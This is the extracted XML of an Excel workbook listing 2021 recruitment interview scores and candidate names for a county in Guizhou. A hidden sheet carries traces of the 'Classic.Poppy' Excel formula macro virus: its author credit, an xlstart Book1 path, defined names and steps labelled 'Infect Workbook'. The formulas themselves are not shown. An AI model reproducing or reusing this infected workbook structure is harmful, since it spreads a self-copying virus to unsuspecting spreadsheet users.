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花名册" sheetId="2" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="9" r:id="rId2"/>
    <sheet name="FTSOZSFJ" sheetId="8" state="hidden" r:id="rId3"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId4"/>
    <externalReference r:id="rId5"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">花名册!$A$2:$K$2</definedName>
    <definedName name="aa">[1]XL4Poppy!$C$39</definedName>
    <definedName name="Bust" localSheetId="2">FTSOZSFJ!$C$31</definedName>
    <definedName name="Continue" localSheetId="2">FTSOZSFJ!$C$9</definedName>
    <definedName name="Document_array" localSheetId="2">{"Book1","事业单位招考准考证制作.xls"}</definedName>
    <definedName name="Documents_array" localSheetId="2">FTSOZSFJ!$B$1:$B$16</definedName>
    <definedName name="Hello">FTSOZSFJ!$A$15</definedName>
    <definedName name="MakeIt">FTSOZSFJ!$A$26</definedName>
    <definedName name="Morning">FTSOZSFJ!$C$39</definedName>
    <definedName name="Poppy">FTSOZSFJ!$C$27</definedName>
    <definedName name="Print_Area_MI">#REF!</definedName>
    <definedName name="半熟练工">[2]材料!$D$5</definedName>
    <definedName name="高级工">[2]材料!$D$3</definedName>
    <definedName name="전">#REF!</definedName>
    <definedName name="주택사업본부">#REF!</definedName>
    <definedName name="철구사업본부">#REF!</definedName>
    <definedName name="普工">[2]材料!$D$6</definedName>
    <definedName name="熟练工">[2]材料!$D$4</definedName>
    <definedName name="水">[2]材料!$D$336</definedName>
    <definedName name="投标时间">[2]材料!$C$2</definedName>
  </definedNames>
  <calcPr calcId="144525"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="163" uniqueCount="42">
  <si>
    <t>织金县2021年乡镇事业单位公开招聘应征入伍大学毕业生面试成绩及总成绩公示名单</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>性别</t>
  </si>
  <si>
    <t>准考证号</t>
  </si>
  <si>
    <t>笔试成绩</t>
  </si>
  <si>
    <t>是否进入面试</t>
  </si>
  <si>
    <t>侯考室</t>
  </si>
  <si>
    <t>面试室</t>
  </si>
  <si>
    <t>面试抽签号</t>
  </si>
  <si>
    <t>面试成绩</t>
  </si>
  <si>
    <t>总成绩</t>
  </si>
  <si>
    <t>晏镭</t>
  </si>
  <si>
    <t>男</t>
  </si>
  <si>
    <t>是</t>
  </si>
  <si>
    <t>人武部四楼会议室</t>
  </si>
  <si>
    <t>人武部党委会议室</t>
  </si>
  <si>
    <t>李玉才</t>
  </si>
  <si>
    <t>陈大杰</t>
  </si>
  <si>
    <t>王兴</t>
  </si>
  <si>
    <t>李春辉</t>
  </si>
  <si>
    <t>王继芳</t>
  </si>
  <si>
    <t>郭大鹏</t>
  </si>
  <si>
    <t>朱顺坤</t>
  </si>
  <si>
    <t>蒋全江</t>
  </si>
  <si>
    <t>赵绍禹</t>
  </si>
  <si>
    <t>何勇</t>
  </si>
  <si>
    <t>蒋全龙</t>
  </si>
  <si>
    <t>邓建江</t>
  </si>
  <si>
    <t>事业单位招考准考证制作.xls</t>
  </si>
  <si>
    <t>Book1</t>
  </si>
  <si>
    <t>C:\Program Files\Microsoft Office\OFFICE11\xlstart\Book1.</t>
  </si>
  <si>
    <t>**Auto and On Sheet Starts Here**</t>
  </si>
  <si>
    <t>Classic.Poppy by VicodinES</t>
  </si>
  <si>
    <t>With Lord Natas</t>
  </si>
  <si>
    <t>An Excel Formula Macro Virus (XF.Classic)</t>
  </si>
  <si>
    <t>Hydrocodone/APAP 10-650 For Your Computer</t>
  </si>
  <si>
    <t>(C) The Narkotic Network 1998</t>
  </si>
  <si>
    <t>**Simple Payload**</t>
  </si>
  <si>
    <t>**Set Our Values and Paths**</t>
  </si>
  <si>
    <t>**Add New Workbook, Infect It, Save It As Book1.xls**</t>
  </si>
  <si>
    <t>**Infect Workbook**</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</si>
</sst>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176" formatCode="mm/dd/yy_)"/>
    <numFmt numFmtId="44" formatCode="_ &quot;￥&quot;* #,##0.00_ ;_ &quot;￥&quot;* \-#,##0.00_ ;_ &quot;￥&quot;* &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="177" formatCode="_(&quot;$&quot;* #,##0_);_(&quot;$&quot;* \(#,##0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="178" formatCode="mmm\ dd\,\ yy"/>
    <numFmt numFmtId="179" formatCode="_(&quot;$&quot;* #,##0.0_);_(&quot;$&quot;* \(#,##0.0\);_(&quot;$&quot;* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="180" formatCode="0_);[Red]\(0\)"/>
  </numFmts>
  <fonts count="41">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <name val="仿宋"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="仿宋_GB2312"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="major"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="仿宋_GB2312"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color indexed="23"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color indexed="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="60"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Helv"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="52"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="52"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="Tahoma"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="ARIAL"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <i/>
      <sz val="16"/>
      <name val="Helv"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17"/>
      <name val="Tahoma"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="바탕체"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="蹈框"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="2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8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="13"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="45"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="51"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="46"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="29"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="55"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="11"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="49"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="57"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="62"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="26"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="53"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="36"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="10"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="52"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="47"/>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s>
  <borders count="1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84">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="16" borderId="7" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="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29" fillId="23"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2"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22" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27"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0" fontId="0" fillId="18" borderId="12" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="9" borderId="0" applyNumberFormat="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0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2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11" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="14" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="13" borderId="10" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="13" borderId="15" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="10" borderId="8" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="16" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="3" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="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22" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="13"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0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="38" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="2" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="40" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="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40" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="30">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="73" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="73" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="73" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="1" xfId="73" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="2" xfId="73" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="3" xfId="73" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="3" xfId="73" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4" borderId="4" xfId="73" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="5" xfId="73" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="67" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="6" xfId="73" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="0" borderId="7" xfId="0" applyNumberFormat="1"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7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="49" fontId="9" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="180" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
  </cellXfs>
  <cellStyles count="84">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="Input [yellow]"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_ET_STYLE_NoName_00_"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烹拳_97MBO" xfId="33"/>
    <cellStyle name="常规 2_Book1" xfId="34"/>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Percent [2]" xfId="41"/>
    <cellStyle name="20% - 强调文字颜色 2" xfId="42" builtinId="34"/>
    <cellStyle name="40% - 强调文字颜色 2" xfId="43" builtinId="35"/>
    <cellStyle name="强调文字颜色 3" xfId="44" builtinId="37"/>
    <cellStyle name="强调文字颜色 4" xfId="45" builtinId="41"/>
    <cellStyle name="Normal_0105第二套审计报表定稿" xfId="46"/>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_Book1" xfId="56"/>
    <cellStyle name="0,0 &#10;NA &#10;" xfId="57"/>
    <cellStyle name="常规 4" xfId="58"/>
    <cellStyle name="Normal - Style1" xfId="59"/>
    <cellStyle name="e鯪9Y_x000B_" xfId="60"/>
    <cellStyle name="Grey" xfId="61"/>
    <cellStyle name="常规_Sheet1" xfId="62"/>
    <cellStyle name="差_Book1" xfId="63"/>
    <cellStyle name="常规 2" xfId="64"/>
    <cellStyle name="常规 3" xfId="65"/>
    <cellStyle name="콤마 [0]_BOILER-CO1" xfId="66"/>
    <cellStyle name="常规_申报___专业技术资格人员综合情况一览表" xfId="67"/>
    <cellStyle name="好_Book1" xfId="68"/>
    <cellStyle name="콤마_BOILER-CO1" xfId="69"/>
    <cellStyle name="통화 [0]_BOILER-CO1" xfId="70"/>
    <cellStyle name="통화_BOILER-CO1" xfId="71"/>
    <cellStyle name="표준_0N-HANDLING " xfId="72"/>
    <cellStyle name="표준_kc-elec system check list" xfId="73"/>
    <cellStyle name="霓付 [0]_97MBO" xfId="74"/>
    <cellStyle name="霓付_97MBO" xfId="75"/>
    <cellStyle name="烹拳 [0]_97MBO" xfId="76"/>
    <cellStyle name="普通_ 白土" xfId="77"/>
    <cellStyle name="千分位[0]_ 白土" xfId="78"/>
    <cellStyle name="千分位_ 白土" xfId="79"/>
    <cellStyle name="千位[0]_laroux" xfId="80"/>
    <cellStyle name="千位_laroux" xfId="81"/>
    <cellStyle name="钎霖_laroux" xfId="82"/>
    <cellStyle name="样式 1" xfId="8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A09\&#30005;&#35805;&#26126;&#32454;&#34920;\&#33487;&#24030;&#65288;&#26080;&#27719;&#24635;,&#21556;&#27743;&#32447;&#36335;&#20462;&#25913;&#65289;\&#24066;&#26412;&#37096;\&#27743;&#33487;&#33487;&#24030;&#26412;&#37096;&#65288;&#20013;&#2283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37;&#31243;&#31639;&#31295;\wsl\bf\&#26500;&#30382;&#28393;&#24341;&#27700;&#21457;&#30005;&#31995;&#32479;\&#26500;&#30382;&#28393;&#24341;&#27700;&#21457;&#30005;&#31995;&#32479;&#65288;&#21407;&#31295;&#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      "/>
      <sheetName val="评估结果分类汇总表"/>
      <sheetName val="流动资产汇总表"/>
      <sheetName val="流动资产--货币"/>
      <sheetName val="流动资产--货币 (2)"/>
      <sheetName val="流动资产--货币 (3)"/>
      <sheetName val="短投汇总表"/>
      <sheetName val="短投"/>
      <sheetName val="短投 (2)"/>
      <sheetName val="流动资产--票据"/>
      <sheetName val="流动资产--应收"/>
      <sheetName val="流动资产--备用金"/>
      <sheetName val="流动资产--其他应收 (2)"/>
      <sheetName val="流动资产--其他应收"/>
      <sheetName val="流动资产--存货"/>
      <sheetName val="流动资产-库存材料"/>
      <sheetName val="流动资产-材料采购"/>
      <sheetName val="流动资产-在库低值"/>
      <sheetName val="流动资产-商品采购"/>
      <sheetName val="流动资产-委托加工材料"/>
      <sheetName val="流动资产-库存商品"/>
      <sheetName val="流动资产-附属生产"/>
      <sheetName val="流动资产-出租商品"/>
      <sheetName val="流动资产-在用低值"/>
      <sheetName val="流动资产--待摊"/>
      <sheetName val="流动资产--待处理"/>
      <sheetName val="一年到期长期债券"/>
      <sheetName val="其他流动资产"/>
      <sheetName val="长期投资汇总表"/>
      <sheetName val="长期投资--股票"/>
      <sheetName val="长期投资--债券"/>
      <sheetName val="长期投资--其他投资"/>
